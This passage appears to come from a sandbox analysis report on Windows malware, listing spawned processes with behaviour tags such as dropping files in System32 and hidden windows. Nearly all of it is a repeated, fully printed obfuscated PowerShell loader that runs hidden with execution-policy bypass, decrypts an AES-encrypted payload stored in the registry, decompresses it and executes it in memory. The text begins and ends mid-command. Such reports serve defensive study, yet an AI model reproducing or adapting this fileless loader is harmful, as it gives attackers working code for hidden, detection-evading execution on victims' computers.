$zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        12⤵
        Checks computer location settings
        Drops file in System32 directory
        Suspicious use of SetWindowsHookEx
        
        PID:2848
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2848).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        13⤵
        
        PID:7160
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2848).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        13⤵
        Hide Artifacts: Hidden Window
        
        PID:5456
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2848).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        13⤵
        
        PID:5716
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2848).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = 